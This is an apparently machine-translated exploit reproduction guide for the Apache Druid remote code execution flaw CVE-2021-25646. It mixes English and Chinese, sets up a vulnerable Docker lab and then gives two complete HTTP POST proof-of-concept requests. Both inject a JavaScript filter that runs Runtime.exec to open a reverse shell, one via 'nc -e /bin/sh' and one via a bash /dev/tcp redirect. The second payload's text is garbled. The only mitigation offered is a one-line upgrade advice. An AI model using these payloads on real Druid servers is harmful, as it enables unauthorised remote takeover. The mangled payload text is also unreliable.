Shulou(Shulou.com)05/31 Report--

How to reproduce the Apache Druid remote code execution vulnerability CVE-2021-25646? aiming at this problem, this article introduces the corresponding analysis and solution in detail, hoping to help more partners who want to solve this problem to find a more simple and feasible method.

1. Summary of vulnerabilities

Apache Druid is a column-oriented open source distributed data store written in Java, which is designed to quickly obtain large amounts of event data and provide low-latency queries on top of the data.

Apache Druid lacks authorization authentication by default, and an attacker can send a specially crafted request to execute arbitrary code using the privileges of the process on the Druid server.

II. Scope of influence

Affected version: Apache Druid

< 0.20.1 安全版本： Apache Druid 0.20.1 三、环境搭建 https://github.com/apache/druid/ https://druid.apache.org/docs/latest/tutorials/index.html 下载0.19版本 https://github.com/apache/druid/releases/tag/druid-0.19.0 解压 cd druid-druid-0.19.0-rc1\distribution\docker docker-compose up -d 打开 http://192.168.123.10:8888 四、漏洞复现 Poc1：通用 POST /druid/indexer/v1/sampler HTTP/1.1Host: 192.168.123.10:8888Accept: application/json, text/plain, */*DNT: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36Referer: http://192.168.123.10:8888/unified-console.htmlAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Content-Type: application/jsonConnection: closeContent-Length: 1007{"type": "index", "spec": {"ioConfig": {"type": "index", "inputSource": {"type": "inline", "data": "{\"isRobot\":true,\"channel\":\"#x\",\"timestamp\":\"2020-12-12T12:10:21.040Z\",\"flags\":\"x\",\"isUnpatrolled\":false,\"page\":\"1\",\"diffUrl\":\"https://xxx.com\",\"added\":1,\"comment\":\"Botskapande Indonesien omdirigering\",\"commentLength\":35,\"isNew\":true,\"isMinor\":false,\"delta\":31,\"isAnonymous\":true,\"user\":\"Lsjbot\",\"deltaBucket\":0,\"deleted\":0,\"namespace\":\"Main\"}"}, "inputFormat": {"type": "json", "keepNullColumns": true}}, "dataSchema": {"dataSource": "sample", "timestampSpec": {"column": "timestamp", "format": "iso"}, "dimensionsSpec": {}, "transformSpec": {"transforms": [], "filter": {"type": "javascript", "dimension": "added", "function": "function(value) {java.lang.Runtime.getRuntime().exec('nc 192.168.123.10 5555 -e /bin/sh')}", "": {"enabled": true}}}}, "type": "index", "tuningConfig": {"type": "index"}}, "samplerConfig": {"numRows": 500, "timeoutMs": 15000}} 注意：因为是docker环境没有bash，这里直接采用nc -e反弹 Poc2：通用 POST /druid/indexer/v1/sampler?for=example-manifest HTTP/1.1Host: 0.0.0.0:8888Content-Length: 1005Accept: application/json, text/plain, */*User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36DNT: 1Content-Type: application/json;charset=UTF-8Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close{"type":"index","spec":{"type":"index","ioConfig":{"type":"index","inputSource":{"type":"http","uris":["https://druid.apache.org/data/example-manifests.tsv"]},"inputFormat":{"type":"tsv","findColumnsFromHeader":true}},"dataSchema":{"dataSource":"sample","timestampSpec":{"column":"timestamp","missingValue":"2010-01-01T00:00:00Z"},"dimensionsSpec":{},"transformSpec":{"transforms":[],"filter":{"type": "javascript", "function": "function(value){return java.lang.Runtime.getRuntime().exec('/bin/bash -c $@|bash 0 echo bash -i >

& / dev/tcp/0.0.0.0/5555 0 > & 1')} "," dimension ":" added " "": {"enabled": "true"}, "type": "index" "tuningConfig": {"type": "index"}, "samplerConfig": {"numRows": 50, "timeoutMs": 10000}}

V. suggestions for restoration

Upgrade to the secure version or above.

This is the answer to the question about how to reproduce the Apache Druid remote code execution vulnerability CVE-2021-25646. I hope the above content can be of some help to you. If you still have a lot of doubts to be solved, you can follow the industry information channel for more related knowledge.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.